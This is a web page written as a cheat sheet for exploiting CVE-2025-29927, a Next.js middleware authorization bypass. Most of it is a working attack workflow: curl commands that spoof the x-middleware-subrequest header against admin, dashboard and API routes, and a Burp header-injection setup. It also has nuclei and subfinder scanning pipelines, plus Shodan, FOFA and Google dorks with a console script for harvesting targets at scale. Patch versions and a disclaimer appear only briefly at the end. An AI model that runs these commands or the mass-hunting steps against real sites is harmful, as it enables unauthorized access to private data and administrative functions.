Next.js Middleware Bypass
CVE-2025-29927 - Authorization bypass via x-middleware-subrequest
Table of Contents
Middleware in Next.js intercepts incoming HTTP requests and processes them before they reach the final route handler. It is commonly used for authentication & authorization (checking if a user is logged in), logging & monitoring (tracking requests for analytics), and request modification (altering headers or query parameters).
Pro Tips
- Middleware runs before any route handler is executed
- It can modify requests, responses, or even block access entirely
- Common use cases: authentication checks, rate limiting, A/B testing, and analytics
CVE-2025-29927 is a critical authorization bypass vulnerability in Next.js middleware. By sending a specially crafted header, attackers can bypass all middleware checks and gain unauthorized access to protected routes.
Tools & Resources
Commands
export function middleware(req) {
if (!req.cookies.token) {
return new Response('Unauthorized', { status: 401 });
}
return NextResponse.next();
}curl -H "x-middleware-subrequest: middleware:middleware:middleware" https://target.com/dashboardPro Tips
- The vulnerability allows bypassing ALL middleware checks
- Affected versions: Next.js 12.x < 12.3.5, 13.x < 13.5.9, 14.x < 14.2.25, 15.x < 15.2.3
- Impact: unauthorized data access, privilege escalation, application takeover
Before exploiting, you need to identify if the target is using Next.js and has vulnerable middleware. Use nuclei templates or manual probing.
Tools & Resources
Commands
echo target.com | nuclei -t nuclei-templates/http/cves/2025/CVE-2025-29927.yamlsubfinder -d target.com -all | nuclei -t nuclei-templates/http/cves/2025/CVE-2025-29927.yamlcat domains.txt | uro | nuclei -t nuclei-templates/http/cves/2025/CVE-2025-29927.yamlPro Tips
- Look for Next.js patterns in responses: x-powered-by, _next/static
- Check for middleware-rewrite headers in responses
- Test manually if automated tools fail
Once you've identified a vulnerable target, exploit the authorization bypass to access protected routes. The vulnerability works by spoofing the x-middleware-subrequest header.
Commands
curl -v https://target.com/dashboardcurl -H "x-middleware-subrequest: middleware:middleware:middleware" https://target.com/dashboardcurl -H "x-middleware-subrequest: middleware:middleware:middleware" https://target.com/api/admincurl -H "x-middleware-subrequest: middleware:middleware:middleware" -H "Cookie: session=valid" https://target.com/adminPro Tips
- Response 200 OK = Vulnerable! 307 Redirect = May still be vulnerable
- Try multiple endpoints - admin, dashboard, API routes
- Use Burp Suite for easier testing and response analysis
Burp Suite provides a graphical interface for testing the vulnerability. Add the malicious header to intercept and modify requests.
Commands
x-middleware-subrequest: middleware:middleware:middleware:middlewareEnable Proxy > Options > Match and Replace > Add headerPro Tips
- Use Burp's Match & Replace to automatically add the header
- Easy to test multiple requests without manual curl commands
- Capture and analyze all responses in one place
For mass hunting, use Shodan to find servers potentially running vulnerable Next.js. Search for the x-middleware-rewrite header which indicates Next.js is in use.
Tools & Resources
Commands
x-middleware-rewritehttp.html:"/_next/static"cpe:"cpe:2.3:a:zeit:next.js"var ipElements=document.querySelectorAll('strong'),ips=[],domains=[];ipElements.forEach(function(e){var t=e.innerHTML.replace(/['"]/g,'').trim();/^(\d{1,3}\.){3}\d{1,3}$/.test(t)?ips.push(t):/^(?!\d+\.)[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$/.test(t)&&domains.push(t)});var dataString='IPs:\n'+ips.join('\n')+'\n\nDomains:\n'+domains.join('\n'),a=document.createElement('a');a.href='data:text/plain;charset=utf-8,'+encodeURIComponent(dataString);a.download='domains.txt';document.body.appendChild(a);a.click();cat domains.txt | uro | nuclei -t nuclei-templates/http/cves/2025/CVE-2025-29927.yamlPro Tips
- Shodan returns ~15,000 results for x-middleware-rewrite
- Use domain filter for cleaner results
- Automate extraction with console script shown above
Use these dorks to discover potentially vulnerable Next.js applications through search engines.
Commands
shodan query: x-middleware-rewriteshodan query: http.html:"/_next/static"fofa: body="/_next/static" AND "x-middleware-rewrite"google: inurl:"/_next" AND intext:"next.config.js" OR intext:"Powered by Next.js"inurl:"/_next" AND intext:"next.config.js"Pro Tips
- Combine multiple search engines for better coverage
- Look for specific Next.js patterns in URLs
- Test discovered targets with nuclei or manual curl
This vulnerability has critical impact as it allows unauthorized access to any route protected by middleware. In severe cases, attackers can compromise the entire application.
Commands
Unauthorized Data Access: View private user informationPrivilege Escalation: Gain administrative access without credentialsApplication Takeover: Complete compromise in severe casesPro Tips
- Always check ALL protected routes, not just obvious ones
- API endpoints often contain sensitive data
- Report to bug bounty programs for rewards
Next.js has released patches for all affected versions. Update to the latest version to remediate this vulnerability.
Commands
Next.js 15.x: Upgrade to 15.2.3 or laterNext.js 14.x: Upgrade to 14.2.25 or laterNext.js 13.x: Upgrade to 13.5.9 or laterNext.js 12.x: Upgrade to 12.3.5 or laterPro Tips
- Always keep Next.js updated to the latest version
- Check package.json for current version
- Consider-rate limiting as additional mitigation
Impact Assessment
- Unauthorized access to protected routes and sensitive data
- Privilege escalation to admin-level access
- Potential complete application compromise
Remediation
For educational and authorized testing purposes only. Always obtain proper authorization before testing.